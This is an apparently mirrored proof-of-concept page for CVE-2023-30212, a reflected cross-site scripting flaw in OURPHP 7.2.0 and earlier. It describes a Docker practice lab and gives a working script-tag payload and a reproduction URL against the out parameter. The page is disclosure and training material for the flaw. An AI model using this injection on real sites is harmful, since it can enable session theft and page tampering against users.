Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-30212 PoC — OURPHP 跨站脚本漏洞

Source
https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE
Associated Vulnerability
Title:OURPHP 跨站脚本漏洞 (CVE-2023-30212)
Description:OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
Description
This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.
Readme
# CVE-2023-30212 POC : Cross-Site Scripting
#### via /client/manage/ourphp_out.php

## Products Affected By CVE-2023-30212 :

| Vendor          | Product         | Version |
|:--------:       |:--------:       |:--------:|
| ourphp          | ourphp          |  7.2.0   |

## Docker Installation Guide :

To install OURPHP <= 7.2.0 in docker you can use [guide ](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE/blob/main/Docker%20Setup%20for%20vulnerability%20CVE-2023-30212%20.pdf) to install docker for practice purpose.


## Explaination of Vulnerability:
```go
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"
```
## Steps to Reproduce the issue:
```go
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
```
## Payload for the Vulnerability:
```go
# </script><script>alert(`xss`)</script>
```
## Video
[![CVE-2023-30212](https://i.postimg.cc/sX95Ghkw/Screenshot-2023-05-25-231747.png)](https://vimeo.com/830293942?share=copy)


## References

1. [NIST](https://nvd.nist.gov/vuln/detail/CVE-2023-30212)
2. [cve.mitre.org](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30212)
3. [Ourphp =>7.2.0 --> Code for reference](https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/)
File Snapshot

 [4.0K]  /data/pocs/0ebc3c10f0956d34945f57f6ddc9584860c4e69c
├── [ 83K]  Docker Setup for vulnerability CVE-2023-30212 .pdf
└── [1.8K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →